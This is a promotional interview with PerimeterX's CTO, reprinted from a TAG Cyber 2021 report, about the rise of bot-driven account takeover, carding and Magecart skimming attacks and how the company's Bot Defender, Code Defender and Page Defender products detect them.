Managing Bot-based Attacks with Threat Detection


As originally appeared in the TAG Cyber 2021 Security Annual report

Bot Attack and Threat Detection

The term “digital transformation” has been in the popular business lexicon for quite a while. In the wake of the COVID-19 pandemic, we’ve seen changes to the digital world that

no one could have predicted, including a significant and sudden uptick in online transactions and interactions—all at a startling pace. Satya Nadella of Microsoft wrote, “In this era of remote everything, we have seen two years’ worth of digital transformation in two months.”

As the world has become more digital, businesses must transform risk calculations, and one area that often gets overlooked is bot-based activity. Bot traffic mimics people, automatically testing username/password combinations and credit card information on websites. While credit card skimming used to be considered a physical threat from a point of sale, it can now happen anytime business is conducted online. Additionally, so-called shopping assistants offer coupons that distract shoppers from their path to purchase, sometimes redirecting shoppers to a competitor’s site for a similar product or the same one at a lower price.

Organizations need to recognize these hidden threats as they transform. To reduce cyber risk, and to protect revenue, organizations are turning to application protection solutions such as those from PerimeterX. The company’s flagship product, PerimeterX Bot Defender, is a behavior-based bot management solution which helps stop bot attacks and keep companies free from account takeover, carding, and operational disruption. We spoke with Ido Safruti, co-founder and CTO of PerimeterX, about why companies can’t forget about web-facing threats.

TAG Cyber: Attackers’ techniques are ever-changing. Are bots getting more sophisticated? How so?

Ido: Yes, bots have grown in sophistication over time, and attacks that used to happen only on the world’s largest websites are now happening on smaller, popular websites such as those for food and grocery delivery.

Since the beginning of the COVID pandemic, we have seen an increase in “sophisticated” attacks using tactics such as headless browsers and JavaScript-enabled bots. Sightings of bots with detailed business logic capabilities to navigate multiple pages and ability to solve CAPTCHAs have increased, as have sophisticated account takeover (ATO) attacks against smaller targets. We have also seen an increase in botnets that are broadly distributed and have higher quality IP addresses—namely utilizing a large range of residential addresses.

It is likely that professional cybercrime rings responsible for sophisticated attacks are now broadening their targets to include more sites and smaller sites. It also appears that the tools to rent or create distributed botnets, as well as more sophisticated bot and ATO attacks, have gotten easier to use and become more widely available on the dark web.

TAG Cyber: What does that mean in terms of attack identification and mitigation?

Ido: Since attackers have shifted and found new techniques and more advanced tools, it will become hard to spot attacks early and will further reduce the efficacy of IP-address reputation as a way to spot bots. Now, it is more important than ever that businesses of all sizes use a sophisticated bot management tool that relies on behavioral analytics, advanced machine learning techniques, predictive models, and security research to block a wide range of sophisticated, automated attacks.

TAG Cyber: Bot Defender uses a combination of fingerprinting, behavioral analytics, and predictive models. How have you been able to extend its foundation to address more types of threats?

Ido: Because of the position Bot Defender plays in protecting the websites, web apps, and APIs of some of the largest e-commerce sites in the world, we are able to leverage the data and intelligence it gathers to address a variety of use cases.

Our Sensor collects and sends hundreds of client-side indicators and signals to the PerimeterX Detector. These signals are used to create baselines for validation of human versus bot activity, identification of suspicious script activity, and malicious browser extensions. The Detector maintains a repository of known attacks across all protected properties, so malicious actions can be blocked quickly. Our Enforcer is the gatekeeper for threat response policies; it enriches and mitigates automated traffic according to business needs. These components are used across our current portfolio to protect enterprises from automated attacks and client-side threats like digital skimming and Magecart, as well as from browser malware.

From day one, our approach was to use the same infrastructure to support multiple solutions, so we built the PerimeterX Platform with extension in mind. It’s gratifying to see that vision and planning come to fruition. In support of this, we recently introduced PerimeterX Code Defender and PerimeterX Page Defender, which leverage the company’s Sensor-Detector-Enforcer approach to stop digital skimming and Magecart attacks and stop coupon assistants from disrupting your website visitors’ paths to purchase.

TAG Cyber: There are a variety of attack methods used on websites and web applications, what are you seeing most in customer environments?

Ido: Attack methods have grown in frequency and sophistication over the last few years. While we’ve seen a variety of attack methods of late, two rise to the top: ATO and digital skimming, often known as Magecart. In an ATO attack, attackers try to take credentials and control accounts to gain access to free content, personal information, credit card information, loyalty points, rewards, or other benefits. The number of ATO attacks hasn’t just risen proportionally—in some sectors we have seen a nearly 500% increase since the shelter-in-place directive went into effect across the world, while legitimate traffic was up only 25%. We’ve also seen an uptick in Magecart attacks in which malicious code is injected into a website’s code base to skim personal information such as email addresses, passwords, and credit card numbers from site visitors.

TAG Cyber: Why is the platform approach important in today’s environment?

Ido: Leaders in digital businesses are looking to leverage the capabilities of a trusted vendor and to gain synergies by working with solutions that can address multiple challenges. Consolidation of point products onto a single cloud-native platform gives the team managing application security visibility into the broader threat landscape, a single dashboard for web analytics, as well as data that is correlated and enriched for more thorough analysis. This approach saves teams from manual correlation and helps them make accurate decisions quickly. Increased efficiency means that DevOps and SecOps teams can focus their efforts on value-added services and bringing new applications to market more quickly. Ultimately, it frees valuable technical resources to focus on growth.

For more on bot protection, visit the PerimeterX Learning Center. For more on the current state of security and threat mitigation, download the 2021 Security Annual report from TAG Cyber.

Forrester Report

PerimeterX Named a Leader in the Forrester Wave™: Bot Management, Q2 2022

Download Report
© PerimeterX, Inc. All rights reserved.